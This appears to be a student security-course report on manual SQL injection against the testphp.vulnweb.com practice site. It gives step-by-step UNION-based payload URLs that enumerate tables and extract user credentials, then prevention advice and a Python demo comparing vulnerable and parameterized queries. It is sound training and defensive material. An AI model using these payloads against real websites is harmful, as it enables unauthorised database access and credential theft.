Performing SQL Injection

PROJECT TASK 2

Perform a SQL injection manually on http://testphp.vulnweb.com . Write a report along with screenshots and mention preventive steps to avoid SQL injection.

SQL [ Structured Query Language ] – Commands are passed indirectly, i.e. in the form of a URL, to get information from the database. Basic SQL commands used here are select, insert into, delete, drop, update/alter, and queries against information_schema.

We need to remember that through URLs we are sending commands to the database, and the commands entered need to be exact, otherwise the page shows an error.

TARGET :http://testphp.vulnweb.com

STEPS TO PERFORM SQL INJECTION / DATABASE HACKING :

1. First we need to check whether the website is connected to a database or not by using the URL –

http://testphp.vulnweb.com/listproducts.php?cat=1

2. Now, to check whether the vulnerability exists in the website or not, we use the URL –
http://testphp.vulnweb.com/listproducts.php?cat=1'

If the site is secure there are no errors and the page remains the same; if changes occur, that indicates a vulnerability.

We observe some changes in the page, which means there is a vulnerability and the site is using a MySQL server. We still need to confirm the vulnerability before we can provide the report, so we dig further to check whether a username and password can be retrieved.
3. Here we check how many columns are available by using the URL –

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1, then order by 2, order by 3, and so on, checking until we get the desired information.

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 . At 12 we got an error, which means a total of 11 columns are available.

4. Now, to find how many of the 11 columns have loopholes / vulnerability, we use the URL –
http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11

"Out of 11, 3 columns [7,2,9] are vulnerable"


5. Now we need to find the name of the database. For that, choose one column out of the 3 [7,2,9]. Actually, the database administrator can see all the data, but because of the loopholes we can also see it.

http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,database(),10,11

We found that the database name is "ACUART".

6. After getting the database name we require the table names from the database, so we need to identify how many tables are available.

Using the URL – http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 from information_schema.tables where table_schema=database()

We got the table names artists, carts, categ, featured, guestbook, pictures, products, "users".

My target = users
7. Now we need to find the columns of the users table [columns are nothing but first name, last name, email id, etc.]. For that we use the URL – http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 from information_schema.columns where table_name=0x7573657273

We used a string-to-hex converter (a bypass technique) to encode [users] into hexadecimal form.

Now we get the columns uname, pass, cc, address, email, name, phone, cart.
Out of these we need the username and password.

8. We need the username and password information, so for that we use the URL –
http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,group_concat(uname,0x2f,pass),10,11 from users

We used the string-to-hex converter for the separator symbol (0x2f) to differentiate between username and password.

Finally, we get username/password = "test/test".


PREVENTIVE STEPS TO AVOID SQL INJECTIONS :

To prevent SQL injections, consider implementing the following steps:

- Use Prepared Statements and Parameterized Queries: These ensure that user input is treated as data, not executable code.
  CODE: SELECT * FROM users WHERE username = ? AND password = ?
- Stored Procedures: Use stored procedures on the database side, which separates data from code.
  CODE: EXECUTE getUserCredentials @username, @password
- Input Validation: Validate and sanitize all user inputs, rejecting any input that does not conform to expected formats.
- Escaping Inputs: Properly escape all user-supplied input using functions provided by your database library.
- Least Privilege Principle: Grant the minimum permissions necessary to the database user account used by your application.
- Database Configuration: Disable or limit features like dynamic SQL execution and ensure error messages do not reveal database structure or queries.
- Web Application Firewalls (WAFs): Implement WAFs to provide an additional layer of defense against SQL injection attempts.
- Regular Security Audits: Conduct regular security audits and code reviews to identify and fix potential vulnerabilities.
- Error Handling: Implement proper error handling to ensure that error messages do not expose sensitive information.

By following these measures, you can significantly reduce the risk of SQL injection attacks on your
applications.
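The example below is added to this report and is not code from testphp.vulnweb.com; it rebuilds the listproducts.php?cat= lookup on an in-memory SQLite table (table names, columns and rows are constructed for the demo) so the string-built query, the parameterized and validated query, and the generic error response can be compared side by side.

```python
"""Added example: the cat= lookup written the vulnerable way and the
hardened way. All tables and rows are constructed sample data."""
import re
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 1, "poster"), (2, 1, "mug"), (3, 2, "shirt")])
    db.execute("INSERT INTO users VALUES ('test', 'test')")  # constructed row
    return db


def list_products_vulnerable(db, cat):
    # The cat value is spliced into the SQL text, so a stray quote breaks
    # the statement (the error seen in step 2) and a UNION clause lets
    # rows from another table ride along with the product list (step 8).
    sql = "SELECT id, name FROM products WHERE cat = " + cat
    return db.execute(sql).fetchall()


def list_products_safe(db, cat):
    # Defence 1, input validation: cat must be a positive integer string.
    if not re.fullmatch(r"[1-9][0-9]*", cat):
        raise ValueError("cat must be a positive integer")
    # Defence 2, parameterized query: the value is bound by the driver and
    # never becomes part of the SQL text, so it can only be compared to cat.
    sql = "SELECT id, name FROM products WHERE cat = ?"
    return db.execute(sql, (int(cat),)).fetchall()


def handle_request(db, cat):
    # Defence 3, error handling: the client gets a fixed message, never the
    # database engine's own error text that step 2 relied on.
    try:
        return {"ok": True, "rows": list_products_safe(db, cat)}
    except (ValueError, sqlite3.Error):
        return {"ok": False, "error": "invalid category"}
```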
